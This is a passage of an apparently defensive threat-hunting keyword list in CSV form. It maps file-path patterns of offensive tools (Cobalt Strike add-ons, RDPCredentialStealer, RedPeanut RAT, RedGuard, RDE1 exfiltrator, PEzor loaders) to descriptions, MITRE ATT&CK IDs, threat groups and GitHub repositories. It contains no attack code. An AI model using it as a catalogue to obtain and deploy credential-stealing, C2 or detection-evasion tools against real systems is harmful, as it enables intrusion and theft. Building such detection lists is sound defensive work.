T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RCStep/CSSG,1,1,N/A,10,10,554,107,2023-09-07T19:41:31Z,2021-01-12T14:39:06Z -*/RDE1.git*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,1,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*/rdll_template*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/RDPassSpray.git*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*/RDPCredentialStealer.git*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*/rdp-enum-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rdp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rdp-vuln-ms12-020.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/readfile_bof.*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/Readfile_BoF,1,1,N/A,10,10,17,4,2022-06-21T04:50:39Z,2021-04-01T03:47:56Z -*/Readfile_BoF/*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/Readfile_BoF,1,1,N/A,10,10,17,4,2022-06-21T04:50:39Z,2021-04-01T03:47:56Z -*/RealTimeSync.exe*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/realvnc-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Reaper.git*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*/Reaper/Reaper.cpp*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*/ReaperX64.zip*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*/REC2.git*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*/recon-archy.git*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*/RecycledInjector*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*/RecycledInjector.git*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*/RedGuard.git*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/RedGuard.go*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/RedGuard_32,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/RedGuard_64,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*/redirector/redirector.py*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*/redis-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/redis-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/redpeanut.cer*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanut.git*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanut.html*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanutAgent/*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPeanutRP/*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*/RedPersist.exe*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,1,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*/RedPersist.git*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,1,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*/redsocks.sh*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*/redsocks-fw.sh*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*/RedTeam_toolkit*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*/red-team-scripts*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/RedWarden.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*/ReferenceSourceLibraries/Sharpire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/ReflectiveDll.c*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/ReflectiveDLLInjection/*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/ReflectiveLoader.c*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 